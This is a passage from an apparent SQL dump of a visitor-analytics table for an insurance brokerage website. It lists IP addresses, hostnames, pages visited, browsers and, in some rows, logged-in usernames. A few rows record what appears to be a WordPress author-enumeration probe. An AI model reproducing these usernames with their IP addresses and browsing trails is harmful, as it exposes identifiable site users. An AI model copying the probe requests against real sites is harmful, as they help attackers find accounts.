6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(28010,'0b_b5496a15eacb338d11a2836f6ec94082','1462978259','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(28011,'0b_6a9d7cb00295c28dc90a94ff7c644058','1462978261','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/register/','',0,'Win8','Chrome 50','us','1280 x 1024','','','','','','3','51',0),(28014,'0b_b5496a15eacb338d11a2836f6ec94082','1462978302','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(28016,'0b_b5496a15eacb338d11a2836f6ec94082','1462978305','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(28019,'0b_b5496a15eacb338d11a2836f6ec94082','1462978308','108.58.88.178','ool-6c3a58b2.static.optonline.net','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(28022,'0b_6a9d7cb00295c28dc90a94ff7c644058','1462978309','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/register/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 50','us','1280 x 1024','','','','','','3','51',0),(28023,'0b_5d43d2e78a5b3accdf015f4b8de11df8','1462978556','171.159.194.11','spxyrch3.bankofamerica.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.yellowpages.com/brooklyn-ny/mip/e-i-b-inc-450867792','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28026,'0b_5d43d2e78a5b3accdf015f4b8de11df8','1462978557','171.159.194.11','spxyrch3.bankofamerica.com','/comments/feed/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28029,'0b_5d43d2e78a5b3accdf015f4b8de11df8','1462978557','171.159.194.11','spxyrch3.bankofamerica.com','/feed/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28032,'0b_5d43d2e78a5b3accdf015f4b8de11df8','1462978557','171.159.194.11','spxyrch3.bankofamerica.com','/home/feed/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28034,'0b_5d43d2e78a5b3accdf015f4b8de11df8','1462978558','171.159.194.11','spxyrch3.bankofamerica.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28035,'0b_b5496a15eacb338d11a2836f6ec94082','1462978561','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/register/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(28038,'0b_6a9d7cb00295c28dc90a94ff7c644058','1462978569','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/register/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/register/','',0,'Win8','Chrome 50','us','1280 x 1024','','','','','','0','51',0),(28041,'0b_6a9d7cb00295c28dc90a94ff7c644058','1462978575','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/case-status/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/register/','',0,'Win8','Chrome 50','us','1280 x 1024','','','','','','0','51',0),(28043,'0b_b5496a15eacb338d11a2836f6ec94082','1462978576','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(28046,'0b_6a9d7cb00295c28dc90a94ff7c644058','1462978700','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/register/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 50','us','1280 x 1024','','','','','','0','51',0),(28049,'0b_6a9d7cb00295c28dc90a94ff7c644058','1462978701','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/register/','',0,'Win8','Chrome 50','us','1280 x 1024','','','','','','0','51',0),(28052,'0b_6a9d7cb00295c28dc90a94ff7c644058','1462978702','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/register/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1280 x 1024','','','','','','0','51',0),(28055,'0b_2f88a148776cb8da267f5302705f90de','1462979353','67.212.162.98','scan03.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(28056,'0b_2f88a148776cb8da267f5302705f90de','1462979353','67.212.162.98','scan03.sitelock.com','/igo/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(28058,'0b_dd335538b97fae4dbcc57351ad4ecc7c','1462980030','207.46.13.124','msnbot-207-46-13-124.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(28059,'0b_5bf482c94c27a52916b4228007a2b16a','1462980703','207.46.13.7','msnbot-207-46-13-7.search.msn.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(28061,'0b_af8e4bdaceea00f7d352faca2ceda250','1462980703','180.76.15.33','baiduspider-180-76-15-33.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(28062,'0b_e69d58c9f60d2a644c5b53e2fe119ae6','1462982710','45.33.36.127','li986-127.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(28065,'0b_2d2314378d0cfa1c0919ff3b938b2101','1462982804','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(28068,'0b_2d2314378d0cfa1c0919ff3b938b2101','1462982806','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(28070,'0b_2d2314378d0cfa1c0919ff3b938b2101','1462982950','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(28073,'0b_2d2314378d0cfa1c0919ff3b938b2101','1462982951','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(28074,'0b_db11b60d079a321928f4d87da9b14852','1462982991','180.76.15.25','baiduspider-180-76-15-25.crawl.baidu.com','/insentives/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(28077,'0b_72ee811995db2abb989fe160a0f7cdfa','1462983418','66.249.66.24','crawl-66-249-66-24.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(28080,'0b_2d2314378d0cfa1c0919ff3b938b2101','1462983682','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','51',0),(28083,'0b_2d2314378d0cfa1c0919ff3b938b2101','1462983683','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(28085,'0b_af8070290b2c083666c34ceb96ddcfbe','1462984008','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1366 x 768','','','','','','0','0',0),(28088,'0b_af8070290b2c083666c34ceb96ddcfbe','1462984010','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1366 x 768','','','','','','0','0',0),(28089,'0b_af8070290b2c083666c34ceb96ddcfbe','1462984014','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1366 x 768','','','','','','0','0',0),(28092,'0b_af8070290b2c083666c34ceb96ddcfbe','1462984143','108.58.88.178','ool-6c3a58b2.static.optonline.net','/underwriting-search/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1366 x 768','','','','jzicher','','0','51',0),(28095,'0b_af8070290b2c083666c34ceb96ddcfbe','1462984145','108.58.88.178','ool-6c3a58b2.static.optonline.net','/carrier-field-underwriting-guides/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1366 x 768','','','','jzicher','','0','51',0),(28098,'0b_af8070290b2c083666c34ceb96ddcfbe','1462984255','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1366 x 768','','','','jzicher','','0','51',0),(28100,'0b_8c95a3a9e1b701c6a911e4ffcfa96b42','1462984778','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28101,'0b_e173a144ca52647d28b60ccf5d8f87c7','1462985416','54.205.228.98','ec2-54-205-228-98.compute-1.amazonaws.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)','','',0,'','','','','','linkdexbot','','','','0','0',0),(28103,'0b_e173a144ca52647d28b60ccf5d8f87c7','1462985416','54.205.228.98','ec2-54-205-228-98.compute-1.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)','','',0,'','','','','','linkdexbot','','','','0','0',0),(28104,'0b_2d2314378d0cfa1c0919ff3b938b2101','1462985484','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','51',0),(28107,'0b_2d2314378d0cfa1c0919ff3b938b2101','1462985485','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(28110,'0b_c29e3f4c5364b4805f14c8655e040f9b','1462986520','52.88.39.19','ec2-52-88-39-19.us-west-2.compute.amazonaws.com','/','Ruby','','',0,'','','','','','','','','','0','0',0),(28113,'0b_38d468e3d436abb97dbe9dfaccb9a12f','1462986851','141.8.143.235','spider-141-8-143-235.yandex.com','/contact/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(28115,'0b_fea198538b41e689cdc1b5f6352dccc3','1462986918','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(28116,'0b_fea198538b41e689cdc1b5f6352dccc3','1462986919','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(28119,'0b_6be978affbbd65040e234e1dcc372303','1462986919','108.87.131.3','108-87-131-3.lightspeed.rcsntx.sbcglobal.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0','http://r.search.yahoo.com/_ylt=A86.J7w4aDNXpUMA.KgnnIlQ;_ylu=X3oDMTE0bjcxMW5vBGNvbG8DZ3ExBHBvcwMxBHZ0aWQDRkZVSTJDMV8xBHNlYwNzcg--/RV=2/RE=1463015609/RO=10/RU=http%3a%2f%2fwww.empireins.com%2f/RK=0/RS=jN9S8R6QxWAaP3jI8Dx6hNMxr_o-','_ylt=A86.J7w4aDNXpUMA.KgnnIlQ;_ylu=X3oDMTE0bjcxMW5vBGNvbG8DZ3ExBHBvcwMxBHZ0aWQDRkZVSTJDMV8xBHNlYwNzcg--',1,'Win10 x64','Firefox 46','us','1366 x 768','Yahoo!','','','','','0','0',0),(28122,'0b_6be978affbbd65040e234e1dcc372303','1462986922','108.87.131.3','108-87-131-3.lightspeed.rcsntx.sbcglobal.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0','http://www.empireins.com/','',0,'Win10 x64','Firefox 46','us','1366 x 768','','','','','','0','0',0),(28125,'0b_fea198538b41e689cdc1b5f6352dccc3','1462986924','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','51',0),(28127,'0b_6be978affbbd65040e234e1dcc372303','1462986971','108.87.131.3','108-87-131-3.lightspeed.rcsntx.sbcglobal.net','/contact/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0','http://www.empireins.com/','',0,'Win10 x64','Firefox 46','us','1366 x 768','','','','','','0','0',0),(28130,'0b_df230a195a8e1e60b05426ccfd2386af','1462987120','70.214.105.43','43.sub-70-214-105.myvzw.com','/','Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1','https://www.google.com/','_notprovided_',1,'iPad','Safari 9 Mobile','us','768 x 1024','Google','','','','','0','0',0),(28133,'0b_df230a195a8e1e60b05426ccfd2386af','1462987123','70.214.105.43','43.sub-70-214-105.myvzw.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1','http://www.empireins.com/','',0,'iPad','Safari 9 Mobile','us','768 x 1024','','','','','','0','0',0),(28134,'0b_df230a195a8e1e60b05426ccfd2386af','1462987129','70.214.105.43','43.sub-70-214-105.myvzw.com','/agent-tools/','Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1','http://www.empireins.com/','',0,'iPad','Safari 9 Mobile','us','768 x 1024','','','','','','0','0',0),(28137,'0b_df230a195a8e1e60b05426ccfd2386af','1462987233','70.214.105.43','43.sub-70-214-105.myvzw.com','/underwriting-cheat-sheets/','Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1','http://www.empireins.com/agent-tools/','',0,'iPad','Safari 9 Mobile','us','768 x 1024','','','','hermankatz','','0','51',0),(28139,'0b_df230a195a8e1e60b05426ccfd2386af','1462987233','70.214.105.43','43.sub-70-214-105.myvzw.com','/underwriting-cheat-sheets/','Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1','http://www.empireins.com/agent-tools/','',0,'iPad','Safari 9 Mobile','us','768 x 1024','','','','hermankatz','','0','51',0),(28142,'0b_9e334734002088a2d15670785d819fe7','1462987286','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(28145,'0b_df230a195a8e1e60b05426ccfd2386af','1462988226','70.214.105.43','43.sub-70-214-105.myvzw.com','/carriers/','Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1','http://www.empireins.com/underwriting-cheat-sheets/','',0,'iPad','Safari 9 Mobile','us','768 x 1024','','','','hermankatz','','0','51',0),(28146,'0b_df230a195a8e1e60b05426ccfd2386af','1462988279','70.214.105.43','43.sub-70-214-105.myvzw.com','/life-product-search/','Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1','http://www.empireins.com/carriers/','',0,'iPad','Safari 9 Mobile','us','768 x 1024','','','','hermankatz','','0','51',0),(28148,'0b_14117ebc80114a575f2988d51228fc46','1462988355','50.108.153.152','50.108.153.152','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1920 x 1080','','','','ykaufman','','0','0',0),(28151,'0b_14117ebc80114a575f2988d51228fc46','1462988366','50.108.153.152','50.108.153.152','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','ykaufman','','0','0',0),(28152,'0b_df230a195a8e1e60b05426ccfd2386af','1462988378','70.214.105.43','43.sub-70-214-105.myvzw.com','/agent-tools/','Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1','http://www.empireins.com/life-product-search/','',0,'iPad','Safari 9 Mobile','us','768 x 1024','','','','hermankatz','','0','51',0),(28155,'0b_14117ebc80114a575f2988d51228fc46','1462988382','50.108.153.152','50.108.153.152','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','ykaufman','','0','0',0),(28158,'0b_df230a195a8e1e60b05426ccfd2386af','1462988393','70.214.105.43','43.sub-70-214-105.myvzw.com','/underwriting-search/','Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1','http://www.empireins.com/agent-tools/','',0,'iPad','Safari 9 Mobile','us','768 x 1024','','','','hermankatz','','0','51',0),(28161,'0b_14117ebc80114a575f2988d51228fc46','1462988404','50.108.153.152','50.108.153.152','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','ykaufman','','0','51',0),(28163,'0b_615a3cadff5346a6862fa8dd7cb8cff3','1462988478','130.185.155.82','130.185.155.82','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(28166,'0b_615a3cadff5346a6862fa8dd7cb8cff3','1462988487','130.185.155.82','130.185.155.82','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(28169,'0b_615a3cadff5346a6862fa8dd7cb8cff3','1462988498','130.185.155.82','130.185.155.82','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(28172,'0b_8c54cf08b6ed89e46d2c875b022823fc','1462990653','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(28175,'0b_9c3689dfc7fa44160b0105ad2fea6299','1462991805','108.29.136.102','static-108-29-136-102.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 50','us','1920 x 1080','Google','','','','','0','0',0),(28176,'0b_9c3689dfc7fa44160b0105ad2fea6299','1462991805','108.29.136.102','static-108-29-136-102.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 50','us','1920 x 1080','Google','','','','','0','0',0),(28179,'0b_9c3689dfc7fa44160b0105ad2fea6299','1462991807','108.29.136.102','static-108-29-136-102.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(28182,'0b_9c3689dfc7fa44160b0105ad2fea6299','1462991816','108.29.136.102','static-108-29-136-102.nycmny.fios.verizon.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(28184,'0b_9c3689dfc7fa44160b0105ad2fea6299','1462991857','108.29.136.102','static-108-29-136-102.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','fully10952','','0','51',0),(28185,'0b_9c3689dfc7fa44160b0105ad2fea6299','1462991861','108.29.136.102','static-108-29-136-102.nycmny.fios.verizon.net','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','fully10952','','0','51',0),(28188,'0b_7d5e9f5aea40221ae133467e65161a72','1462992053','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(28190,'0b_9c3689dfc7fa44160b0105ad2fea6299','1462992129','108.29.136.102','static-108-29-136-102.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/case-status/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','fully10952','','0','51',0),(28191,'0b_9c3689dfc7fa44160b0105ad2fea6299','1462992130','108.29.136.102','static-108-29-136-102.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','fully10952','','0','0',0),(28193,'0b_9c3689dfc7fa44160b0105ad2fea6299','1462992145','108.29.136.102','static-108-29-136-102.nycmny.fios.verizon.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','fully10952','','0','51',0),(28196,'0b_f359ecbca0df3d6c71355cf4369f01fa','1462992922','208.115.111.66','208-115-111-66-reverse.wowrack.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(28197,'0b_d04ec93a7069ed4c76bd5666eb3e998f','1462993872','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','','','','','execut1ve','','0','0',0),(28199,'0b_f897972c7725038f84ff73edc657d1a4','1462994132','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 